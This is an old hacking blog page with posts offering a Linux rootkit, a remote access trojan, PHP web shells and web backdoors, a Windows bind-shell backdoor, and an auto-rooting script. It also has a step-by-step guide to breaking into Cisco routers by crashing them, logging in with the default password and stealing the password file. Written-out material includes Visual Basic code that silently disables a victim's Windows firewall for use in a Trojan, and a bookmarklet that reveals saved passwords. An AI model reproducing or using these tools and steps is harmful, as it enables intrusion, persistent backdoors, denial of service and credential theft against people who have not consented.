Wednesday, February 01, 2012
Anu
KBeast (Kernel Beast) 2012 is a Linux rootkit that hides the loadable kernel module, hides files and directories, hides processes, hides sockets and connections, performs keystroke logging, has anti-kill functionality and more.
Showing posts with label Script. Show all posts
Showing posts with label Script. Show all posts
Wednesday, February 1, 2012
Tuesday, December 27, 2011
HACK : Download F.B.I RAT with Full source coding
F.B.I RAT (Full Backdoor Intergration) V0.1. Supports
xp/Vista/Windows 7, all features have been tested on these OS's
including injection, but there have been some limitations on the
sniffer.
SQL Injection : False SQL Injection / Advance Blind SQL Injection
This is a brief whitepaper called False SQL Injection and Advanced Blind SQL Injection. This document is written for publicizing of new SQL injection method about detour some web firewall or some security solution.
In order to read this document, you have to understand basic MySQL principles. I classified the term "SQL Injection" as 2 meanings. The first is a general SQL Injection, we usually call this "True SQL Injection", and the second is a "False SQL Injection". Though in this documentation, you can know something special about "True SQL Injection"
Monday, December 26, 2011
PHP Shell - mass mailer, ddoser, connect-back shell, bind shell & more
Ani-Shell is a simple PHP shell with some unique features like Mass Mailer ,
A simple Web-Server Fuzzer , DDoser, Back Connect , Bind Shell etc etc ! This shell
has immense capabilities and have been written with some coding standards in mind for better editing and customization.
Customization
1. Email Trace back is set to Off as default and emails will not be sent , If you are setting
This feature on make sure you change the default email address (lionaneesh@gmail.com) to Your email
Address, Please Change it before using.
2. As default Lock Mode is set to on! This should not be change unless you want your shell exposed.
3. As default the Anti-Crawler Feature is set to “off” ! Change it to “on” for anti-crawler support , and longer Shell life!
4. A variable named greatings can be changed to change the Shell's greating message.
Saturday, December 24, 2011
Auto rooting script : Hack PC with script
This is the auto-rooting script that is written for Linux, SunOS, Mac OS X, and FreeBSD.
Web Backdoor Cookie
WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool capable to maintain access to a compromised web server. WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute system commands to the compromised server. The obfuscated communication is accomplished using HTTP header's Cookie fields under valid client HTTP requests and relative web server's responses.
Friday, December 23, 2011
Create fake mail sender.
Sending fake email or email spoofing is really easy as there are many
websites available online for this. You can get hundreds of results by
searching in Google. But you can also create your own fake email sender
website to send fake emails.
Saturday, May 28, 2011
How to create a PPP session through SSH to a remote machine to which you don't have ROOT?
For no particular reason, I've collected a lot of tools and trick for
tunneling one network through another. In addition to OpenVPN, IPSec,
and other dedicated tools designed to provide Virtual Private Network
functionality, I've played around a lot with running IP traffic through
SSH, SSL, and even plain HTTP tunnels.
This is typically done when you want to get around someone's firewall, but also can be convenient for bridging local area protocols (such as old school LAN games like DOOM) across the Internet. Yeah, OK, but mostly its for piercing firewalls.
This is typically done when you want to get around someone's firewall, but also can be convenient for bridging local area protocols (such as old school LAN games like DOOM) across the Internet. Yeah, OK, but mostly its for piercing firewalls.
Friday, May 27, 2011
Root privileges in Linux...
Security researcher Dan Rosenberg presents a small demo program which combines several security holes to obtain root privileges on Linux systems on Full Disclosure Security mailing list.
He combined some existing vulnerabilities with the vulnerability discovered by Nelson Elhage
in connection with the kernel’s thread management and troubleshooting
routines (CVE-2010-4258).With this exploit, an attacker can potentially
exploit an OOPS to write a null byte into the kernel’s memory area.
Network programming in C under Linux
In this tutorial we will deal with networkprogramming under LINUX (/UNIX).
During this we
will only work with the Programminglanguage C. Precognition of C are needed.
You should know what a describtor or a string is. #
Furthermore the reader has to be intrested, so when you don't know one of the listed functions (e.g. "read", "write") you should check out the according manual ( $ man function).
Misspellings are due to the state of mind of the author. The text is written in a simple form and only contains the main important details of the functions.
A little bit of knowlegde about TCP/IP should be enough to understand the topic, wheras we will only deal with IPv4 here. We will emphasise on TCP.
So this Tut is an introduction and topics like threading or multicasting will not be discussed.
Furthermore the reader has to be intrested, so when you don't know one of the listed functions (e.g. "read", "write") you should check out the according manual ( $ man function).
Misspellings are due to the state of mind of the author. The text is written in a simple form and only contains the main important details of the functions.
A little bit of knowlegde about TCP/IP should be enough to understand the topic, wheras we will only deal with IPv4 here. We will emphasise on TCP.
So this Tut is an introduction and topics like threading or multicasting will not be discussed.
Sunday, April 10, 2011
How to hack into Cisco Router?
Warning: DO NOT use this to damage Cisco systems, or gain unauthorized access to systems. This tutorial is just something to use for educational purposes. Only use this information in a legal way (the hacker wargames for instance), and do not damage or destroy anything. This is a step-by-step guide on how a series of proven cisco exploits can be used to gain access. If you get caught breaking into a cisco router, or screw the system up, you can interrupt hundreds of internet clients, and cost thousands of dollars, so only use this when you are allowed!! Using this the wrong way will get you into a lot of trouble.
Section 1: Why hack a cisco router?
You probably are wondering.. why hack into a cisco router?
The reason being is that they are useful when it comes to breaking into other systems...
Cisco routers are very fast, some with 18 T1 connections on one system, and they are very flexible and can be usedin DoS attacks or to hack other systems since most of them run telnet.
They also have thousands of packets going through them at any one time, which can be captured and decoded... A lot of cisco routers are also trusted systems, and will let you have a certain amount of access to other computers on it's network.
----------------------------------
Section 2: finding a cisco router
Finding a cisco router is a fairly easy task, almost every ISP will route through at least one cisco router. The
easiest way to find a cisco router is to run a traceroute from dos (type "tracert" and then the IP address of
anyone's computer), you can trace pretty much anyone because the trace will show all of the computer systems between your computer and their computer. One of these systems will probably have the name "cisco" in it's name. If you find one like this, copy down it's IP address.
Now you have the location of a cisco router, but it may have a firewall protecting it, so you should see if it's
being blocked by pinging it a couple times, if you get the ping returned to you, it might not be blocked. Another way is to try to access some of the cisco router's ports, you can do this simply by using telnet, and opening a connection to the router on port 23.. If it asks for a password, but no username, you are at the router, but if it wants a username aswell, you are probably at a firewall.
Try to find a router without a firewall, since this tutorial is on the routers and not how to get past the
firewalls. Once you're sure you have found a good system, you should find a proxy server which will allow you to use port 23, this way your IP will not be logged by the router.
---------------------------------
Section 3: how to break into a cisco router
Cisco routers running v4.1 software (which currently is most of them) will be easily disabled. You simply connect to the router on port 23 through your proxy server, and enter a HUGE password string, something like;
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1029384 7465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpw oeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeiruty alskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjf hgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxnc bv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019ds k10293847465qpwoeirutyalskdjfhgzmxncbv019dsk
Now wait, the cisco system might reboot, in which case you can't hack it because it is offline.. But it will
probably freeze up for a period of 2-10 minutes, which you must use to get in.
If neither happens, then it is not running the vulnerable software, in which case you can try several DoS attacks,like a huge ping. Go to dos and type "ping -l 56550 cisco.router.ip -t", this will do the same trick for you.
While it is frozen, open up another connection to it from some other proxy, and put the password as "admin", the reason for this is because by default, this is the router's password, and while it is temporarily disabled, it will revert to it's default state.
Now that you have logged in, you must acquire the password file! The systems run different software, but most will have a prompt like "htl-textil" or something, now type "?" for a list of commands, you will see a huge list of commands, somewhere in there you will find a transfer command, use that to get the password file of admin (which is the current user) and send it to your own IP address on port 23. But before you do this, set up HyperTerminal to wait for a call from the cisco router. Now once you send the file, HyperTerminal will ask you if you want to accept the file that this machine is sending you, say yes and save it to disk. Logout.
You are now past the hardest part, give yourself a pat on the back and get ready to break that password!
------------------------------
Section 4: breaking the password
Now that you have acquired the password file, you have to break it so you can access the router again. To do this, you can run a program like John the Ripper or something on the password file, and you may break it.
This is the easiest way, and the way i would recommend. Another way would be to try and decrypt it. For this you will need some decryption software, a lot a patience, and some of the decryption sequences.
Here is a sequence for decrypting a cisco password, you have to compile this in linux:
If you do not have Linux, then the only way to break the password is to run a dictionary or brute-force attack on the file with John the Ripper or another password-cracker.
-------------------------------
Section 5: Using the router
To use this wonderful piece of technology, you will have to be able to connect to it, use a proxy if you do not want your IP logged. Once you have logged in, you'll want to disable the history so no one can look at what you were doing, type in "terminal history size 0". Now it won't remember anything! Type "?" for a list of all of the router's commands, and you will be able to use most of them.
These routers usually have telnet, so you can use telnet to connect to other systems, (like unix boxes) and hack into them. It also is equipped with ping and traceroute, which you can use to trace systems or do DoS attacks. You may also be able to use it to intercept packets, but i do not recommend this, as it will not always work, and may get you noticed....
---------------------------------
If you don't hack a cisco your first time, don't worry... you probably won't do it the first time, or even the
second. It takes practice and patience. This is just to show you how... And make sure you are going after something that is LEGAL.
Thanks...
Website hacking tool...
Do you want to Telnet or SSH to your
website? In simple terms, Telnet and SSH allows you to remotely control
your webserver so that you can easily change the file permissions of
your web pages, create new files and do more.
Wednesday, April 6, 2011
How to see password behind start/asterisks?
Hello guys,
I am going to show you in a short tutorial how to read out a password of a web browser.
Saturday, March 26, 2011
How to disable Windows firewall from VB?
Need to disable the firewall of your neighbor ? And you have physical access to his computer ? Or just want to learn it for fun ? I required disabling the XP firewall for so reason and I was able to do it in one line of code using command prompt to enter registry values. Also, this code disables it,but it doesn't kill it.So that If the person notices, it can be turned back on (most prominent and common viruses today first disable the firewall,so he will not be surprised unless he is a plain dumb). While the following codes disable the firewalls,you can be creative if you can design a simple Trojan and embed this code in it. Experiment and learn.
Please note due to display constraints,the code here may not be displayed as in Visual Basic IDE,It will be wrapped up in several lines like the one given below..but you get the idea..
Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v ""EnableFirewall"" /t REG_DWORD /d ""0"" /f", vbHide
Here is another piece of code that will do it. Instead of disabling it, it allows exceptions to the firewall, and adds a program as an exception.
Public Sub FirewallException(Path As String)
Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v ""DoNotAllowExceptions"" /t REG_DWORD /d ""0"" /f", vbHide
Shell "cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v """ & Path & """ /t REG_SZ /d """ & Path & ":*:Enabled:Windows Messanger"" /f", vbHide
End Sub
Put the above code into a module. To use, put this in your code to add itself to the exception list. You can call this code by using this code -
Call FirewallException(App.Path & "\" & App.EXEName & ".exe")
Also,you can plainly delete some important files using VB6 if you really want to trash his windows..more on this next time.Or If you want to program more prank codes,you can read this article about prank Programming
Till then,Keep (prank) programming :)
Thanks...
Sunday, March 20, 2011
Write Custom Basic Authentication Plugin for Squid in Python?
To write a Python program which can be used to authenticate for Squid proxy server. This is useful when you don’t want to configure complex systems like LDAP, ntlm etc.
Use Cases
- When you want to authenticate clients using mysql database.
- When you want to authenticate clients using flat files or /etc/passwd file or some custom service on your network.
How to proceed
From auth_param section in squid.conf file:Specify the command for the external authenticator. Such a program reads a line containing "username password" and replies "OK" or "ERR" in an endless loop. "ERR" responses may optionally be followed by a error description available as %m in the returned error page.That clearly states that our python program should read a line from standard input (stdin) and write the appropriate response to the standard output (stdout). But there are some issues with I/O. The output should be unbuffered and should be flushed to standard output immediately after the response is known.
By default, the basic authentication scheme is not used unless a program is specified.
So, lets see a small program where we authenticate using a function ‘matchpassword()‘. This function returns True when username, password pair matches and returns False when they mismatch.
|
#!/usr/bin/python
import sys
import socket
"""USAGE:The function returns True if the user and passwd match False otherwise"""
def matchpasswd(login,passwd):
# Write your own function definition.
# Use mysql, files, /etc/passwd or some service or whatever you want
CLICK HERE TO DOWNLOAD FULL SCRIPT (1KB)
# you need to specify /usr/bin/python if your file is not executable and needs an interpreter to be invoked.
# Replace /usr/bin/python with /usr/bin/php , if you write auth program in php.
auth_param basic program /usr/bin/python /etc/squid/custom_auth.py
# how many instances of the above program should run concurrently
auth_param basic children 5
# display some message to clients when they are asked for username, password
auth_param basic realm Please enter your proxy server username and password
# for how much time the authentication should be valid
auth_param basic credentialsttl 2 hours
# whether username, password should be case sensitive or not
auth_param basic casesensitive on# acl to force proxy authentication
acl authenticated proxy_auth REQUIRED
# acl to define IPs from your lan
acl lan src 192.168.0.0/16
# acl to force clients on your lan to authenticate
http_access allow lan authenticatedLimitation
Username can’t contain spaces. Otherwise program will not be able to parse/extract username, password from standard input.THANKS........
Monday, March 7, 2011
Backdoor for Windows (Hack via BACKDOOR)...
Here is a backdoor written in VC++ for Windows (NT/2K/XP/2003/VISTA/WIN7)....
The Smallest VC++ Coded Universal Windows Backdoor for all versions of Windows NT/2K/XP/2003 with any service pack.But not for Windows 98/ME! since Microsoft stopped the support for them, i can't code for an unsupport Operating system. :))
A Tini, Small, Petite app that listen on a fixed port and creates a command shell when it receives a connection.
Default port of listening is : 8080
Working
--===--
Just run it. It listens on Port 8080. Currently it is hardcoded in the program to keep the size to the minumum. But if you want you can change it at the exe.
Usage
Use netcat to connect to the ip address where the program is listening at port 8080. Voila!
You end up in Cmd Shell. Then what else?. Enjoy your stay!.
You can delete the Tx after you have been dropped on to the shell. The process will exit automatically. The only connection between you & the target machine will through the cmd.exe.
Rest you can figure it out. :)
A small how to change port description!
Use the port in htons() format. Convert it to hex, swap it to write it to exe using hex editor.
For example, if you want the program to listen on 3278 instead of 8080,
htons(3278) = 52748 in decimal
Convert it to hex = CE0C
Now use the hex editor open the Tx.exe, search for 1F90 replace it with 0CCE. Remember to swap the after hex conversion.
Pretty simple isn't it?.
Source Code Statistics
VC++ Rockz! :)
Directory of Z:\Proggies\Tx
XX/XX/XX XX:XX DIR .
XX/XX/XX XX:XX DIR ..
XX/XX/XX XX:XX 2,885 ReadMe.txt
XX/XX/XX XX:XX 1,506 Tx.cpp
XX/XX/XX XX:XX 924 Tx.exe
3 File(s) 5,315 bytes
Disclaimer
The Author accepts no responsibilities for whatever you do
with this program.
DOWNLOAD
Thanks...
Friday, March 4, 2011
(BASIC) How to hack with JavaScript?
Basic JavaScript hacking
LEVEL 1
You must first obtain the "source code": Set the security of Internet Explorer to high, click on the link to level 1 at the very top of the menu bar, Internet Explorer, the File, Edit, View, etc. Press the "View", "Source".This will take it up a Notepad window.
LEVEL 1
You must first obtain the "source code": Set the security of Internet Explorer to high, click on the link to level 1 at the very top of the menu bar, Internet Explorer, the File, Edit, View, etc. Press the "View", "Source".This will take it up a Notepad window.
Look for:
passwort=prompt("Please enter password!","") passwort = prompt ( "Please enter password !","")
This ensures a prompt box you can write in, that you enter as a password is stored in the variable "passwort".
if (passwort=="easy") if (passwort == "easy")
This checks on "passwort" (what you type) is "easy", the password for level 1 is when the "easy".
Set back security to medium and click on the link to the Level 1and type "easy".
Use the same procedure to obtain the "source code".
LEVEL 2
Once you have retrieved the Notepad window, there will be a lot of code. Just scroll further down, find this:
var m1, i; was m1, i;
m1="JavaScript"; m1 = "JavaScript";
value=prompt("Please enter password!",""); value = prompt ( "Please enter password !","");
if (value==m1) { if (value == m1) (
window.location=value+".htm"; window.location = value + ". htm";
i=4; i = 4;
What you type being stored in the variable "value",
if (value==m1) if (value == m1)
"m1" is a variable that contains a value. See further up:
m1="JavaScript " m1 = "JavaScript"
The password is "JavaScript".
Stay in touch for more tuts on tht topic...
thanks...
Sunday, February 27, 2011
Credit Card Generator...
If you just need a bunch of numbers use the online credit card number generator. That page is generated by an online version of this script. The program here will only be useful to you if you know what one of Python, Java, C#, PHP or Javascript are, and how to run a program in one of them.
Command line Python program, Java program, C# program, PHP script, and Javascript script to generate valid (MOD 10) credit card numbers. Useful for testing e-commerce sites. (Note: You can't actually buy anything with these). Should run on any platform.
This generates 13 and 16 digit VISA, Mastercard, Amex, and a whole bunch of others.
The ZIP and TAR.GZ below contain all five versions: The Python, Java, C#, PHP and Javascript files.
DOWNLOAD ZIP
DOWNLOAD TAR.GZ
Some Credit Card number that are generated by this script :
Thanks....Mastercard
5469556980208213
5463953445972721
5320829849770650
539962418390 0286
5352340838645102
5492810101229769
5129360208853062
5438148259588257
54 14523486455819
5299682177060559VISA 16 digit
4556974407984448
4539259449022205
4532835822372163
4916573168658970
4 485031264986606
4929769318299260
4929772322289319
4716974877516974
4929723 626896986
4615303078076210VISA 13 digit
4532430378115
4916117270200
4539090863997
4929067889465
4539577858163American Express
376992381151459
341209155113991
370572171400526
377198398554763
375 746228490996Discover
6011416287171153
6011694271846473
6011227217368987Di ners Club
38067019828289
30175247311909
30088973884553enRoute
214953836766511
21 4992102210101
214997942418806JCB 15 digit
210048813903833
180067078153021
210055764566949JCB 16 digit
3096731115601402
3112362698264622
3088226733055206Voyager
8699315399 63591
869957222943269
869999304824058
Tuesday, February 22, 2011
How to see passwords hidden behind asterisks?
For some reason if you don’t remember the password used to login to your google accounts or any other, and want to get back the hidden password, there is an easy way to view those passwords hidden behind the asterisk (*) characters.
You might have given the option to save the password for that particular site when your browser asked, the first time while entering the user name and password while logging in. The browser will automatically display the password if you have saved it before and you only need to press the login button. But if you need to know / don’t remember the password that is hidden behind the asterisk characters here is dead simple way to see those passwords quickly.
For firefox users, there’s always the option to see saved passwords. But this trick is far more simple than that and works on Internet Explorer, Firefox, Google Chrome, Netscape, Safari and Opera. Here’s what you have to do.
Visit the login screen of the desired website.
The browser will automatically shown the passwords in the fields, but will be hidden with the asterisks characters.
Now, Copy and paste the following code in your address bar and press enter.
javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "n"; } } if (s) alert("Passwords in forms on this page:nn" + s); else alert("There are no passwords in forms on this page.");})();The password will now be shown in a small window.
Tip: Always note down the important passwords of your online accounts in a piece of paper and keep it safely. Never leave the passwords for the browsers to remember.
Thanks....
Subscribe to:
Posts (Atom)
